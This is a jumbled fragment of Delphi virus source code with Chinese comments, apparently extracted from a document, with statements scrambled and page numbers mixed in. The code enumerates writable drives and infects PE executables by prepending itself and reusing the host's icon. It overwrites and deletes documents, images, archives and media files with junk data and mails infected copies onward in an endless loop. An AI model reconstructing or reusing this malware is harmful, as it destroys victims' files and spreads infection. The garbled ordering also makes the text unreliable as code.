【正文】 //感染和發(fā)郵件 end。, Si, Pi)。 CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, 0, nil, 39。 //真正的宿主文件，多一個(gè) 空格 ExtractFile(TmpFile)。 TmpFile := TmpFile + 32 + 39。) = 0 then InfectFiles //感染和發(fā)郵件 else //已寄生于宿主程序上了，開(kāi)始工作 begin TmpFile := ParamStr(0)。 //如果是原始病毒體自己 if CompareText(ExtractFileName(ParamStr(0)), 39。 end。 //發(fā)帶毒郵件 Sleep(1000 * 60 * 5)。)。, 39。 while True do //死循環(huán) begin for i := Len downto 1 do //遍歷每個(gè)磁盤驅(qū)動(dòng)器 LoopFiles(DriverList[i] + 39。 //去死吧！ DriverList := GetDrives。 i, Len: Integer。 { 遍歷磁盤上所有的文件 } procedure InfectFiles。 FreeAndNil(SubDir)。39。 Count := 1。 end。, faDirectory, SearchRec) = 0) then begin repeat if IsValidDir(SearchRec) = 1 then ()。 if (FindFirst(Path + 39。 FindClose(SearchRec)。 until (FindNext(SearchRec) 0)。 end。 //摧毀文件 end。.AVI39。.CHM39。.PDF39。.SWF39。.GIF39。.JPEG39。.JPG39。.ASF39。.MPEG39。.RAR39。.ZIP39。.WMA39。.RA39。.RM39。.MP339。.MDB39。.XLS39。.DOC39。IND39。.ADC39。.WAB39。.ASP39。.HTML39。.HTM39。) then begin InfectOneFile(Fn)。) or (Ext = 39。 if (Ext = 39。 //調(diào)整消息隊(duì)列，避免引起懷疑 if IsValidDir(SearchRec) = 0 then begin Fn := Path + 。 //是根目錄 end。..39。.39。..39。.39。 Function IsValidDir()function IsValidDir(SearchRec: TSearchRec): Integer。 SearchRec: TSearchRec。 Fn, Ext: string。 { 遍歷目錄，感染和摧毀文件 } procedure LoopFiles(Path, Mask: string)。 end。 DiskType := GetDriveType(PChar(Str))。 Str := D + 39。 i: Integer。 D: Char。 { 獲得可寫(xiě)的驅(qū)動(dòng)器列表 } Function GetDrives()function GetDrives: string。 //刪除之 except end。 //關(guān)閉文件 end。 end。 //定位 //寫(xiě)入垃圾碼，將文件徹底破壞掉 FileWrite(FileHandle, Catchword, Len)。 //每個(gè)間隔塊的大 小 Len := Length(Catchword)。 //寫(xiě)入垃圾碼的隨機(jī)次數(shù) if Max 5 then Max := 5。 Randomize。 //打開(kāi)文件 try Size := GetFileSize(FileHandle, nil)。 begin try SetFileAttributes(PChar(FileName), 0)。 var FileHandle: Integer。 end。 except。 //替換宿 主文件 。 。 end。 (iID, 4)。 //寫(xiě)入已感染的標(biāo)記 (0, 2)。 //寫(xiě)入病毒體主圖標(biāo)到病毒體尾部之間的數(shù)據(jù) CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize IconTail)。 try //寫(xiě)入病毒體主圖標(biāo)之前的數(shù)據(jù) CopyStream(HdrStream, 0, DstStream, 0, IconOffset)。 SrcStream := (FileName, fmOpenRead)。 18 finally 。 := ExtractIcon(HInstance, PChar(FileName), 0)。 try aIcon := 。 IcoStream := 。 end。 if (iID = ID) or ( 10240) then //太小的文件不感染 Infected := True。 (4, soFromEnd)。 end。 if (Buf[0] = 80) and (Buf[1] = 69) then //PE 標(biāo)記 17 begin IsPE := True。 try for i := 0 to $108 do //檢查 PE 文件頭 begin (i, soFromBeginning)。 IsPE := False。) = 0 then //是自己則 不感染 Exit。 begin try //出錯(cuò)則文件正在被使用，退出 if CompareText(FileName, 39。 i: Integer。 aIcon: TIcon。 IcoStream, DstStream: TMemoryStream。 16 { 感染 PE 文件 } procedure InfectOneFile(FileName: string)。 { 發(fā)帶毒郵件 } procedure SendMail。 := nil。 := State。 := nil。 := nil。 State: Word)。 end。 end。 end。 //跳過(guò)頭部的病毒部分